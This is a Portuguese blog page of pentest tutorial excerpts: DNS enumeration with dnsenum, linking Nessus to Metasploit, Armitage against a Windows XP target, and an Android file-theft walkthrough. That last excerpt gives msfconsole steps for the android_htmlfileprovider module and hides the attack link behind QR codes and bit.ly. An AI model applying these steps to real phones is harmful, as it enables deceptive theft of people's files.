Mostrando postagens com marcador Programas Invasores. Mostrar todas as postagens
Ao se executar um pentest, a parte mais importante, mais trabalhosa e que vai demandar mais de nosso tempo é o Levantamento de informações, quanto mais informações conseguirmos melhor será nosso relatório final e a possibilidade de encontrarmos falhas no sistema testado.
Existem diversas ferramentas que auxiliam no levantamento de informações e uma das mais usadas para conseguir informação de um servidor DNS é o Dnsenum e vamos mostrar aqui como usar essa importante ferramenta, que é bem simples por sinal.
Usando o Backtrack podemos abrir um terminal e acessar o diretório/pentest/enumeration/dns/dnsenum
Para rodar a ferramenta basta digitar ./dnsenum.pl ele vai mostrar as opções de uso da ferramenta. Para um teste básico basta digitar o comando mais o domínio que deseja
Nessa dica gostaria de mostrar como usar o nessus juntamente com o Metasploit, fazer isso auxilia muito na hora de encontrar e explorar vulnerabilidades nos sistemas alvo.
Para usar você precisa ter o Nessus instalado e configurado para uso seja no backtrack ou em outra máquina.
Vai precisar também do Metaspoit Framework do Backtrack 5 R3
Abra o Metasploit e na console digite load nessus para carregar o plugin do nessus.
Para conectar à sua instalação do nessus digite nessus_connect msf:msf@127.0.0.1:8843 ok
Mude o local onde está msf:msf pelo seu login e senha de acesso ao sistema Nessus e se necessário caso o Nessus esteja em outra máquina que não seja o Backtrack mude 127.0.0.1 para o IP do computador que tem o Nessus instalado.
Hoje gostaria de mostrar pra vocês alguns passos simples para usar o Armitage no Backtrack 5 R3
Como sabem essas informações devem ser usadas com responsabilidade.
O Armitage é uma ferramenta que auxilia no uso do Metasploit Framework, uma ferramenta bastante utilizada para fazer PenTest. Ela já vem instalada no Backtrack.
Nossa máquina alvo é um sistema Windows XP com Service Pack 3 Instalado, que está com o IP 192.168.2.93.
Você pode tentar com um sistema semelhante ou pode fazer o download dessa VM que é uma Máquina Virtual Linux intencionalmente com muitas vulnerabilidades que podem ser exploradas.
Vamos lá então
Abra o Armitage e o primeiro passo é adicionar a console nossa máquina alvo, para isso faça o seguinte:
Clique no menu Hosts e clique em Add Hosts
Digite o IP da máquina Alvo e clique Add

Pode tirar proveito de uma aplicação web vulnerável. Ao utilizar este usuário pode executar software d
Nesse arrigo estaremos abordando uma técnica de "hackear" os dispositivos moveis
com o sistema operacional Android. Vamos utilizar a ferramente já conhecida por alguns, o Metasploit com um auxiliar de sua biblioteca que pode ser encontrada no Sistema operacional BackTrack. Isso pode ser possível quando um dispositivo esta conectado em sua rede local, Mas usaremos o DynDNS que nos da um alcance melhor do ataque, e veremos como ofuscar o endereço através de codigos QR e site que encurtam links como o bit.ly .
Vamos começar!
Roubar arquivos android_htmlfileprovider
A primeira coisa é começar o msfconsole no terminal do backtrack
- root@bt:~# /opt/framework3/msf3/msfconsole
Agora vamos usar um dos módulos auxiliares do Metasploit, que serve exatamente para o nosso objetivo:
- msf > use gather/android_htmlfileprovider
- msf auxiliary(android_htmlfileprovider) >
Agora, vamos ver as opções que oferece o módulo...
- msf auxiliary(android_htmlfileprovider) > show options
- FILES (arquivos do Android que queremos roubar)
- SRVHOST (IP local que estará a espera de conexões)
- SRVPORT (A porta que estará a espera de conexões)
- SSL (ALTERNATIVA - Se queremos usar SSL para negociação da conexão)
- SSLVersion (Se tiver ativado a opção acima, indique a versão do SSL )
- URIPATH (A URI que será utilizada)
No momento , não vamos tocar na opção FILES. Já na opção SRVPORT mudará para 80, uma vez que é a porta http normal, e será mais suspeito se conectar-se a uma outra porta. Além disso URIPATH também vai mudar, que po













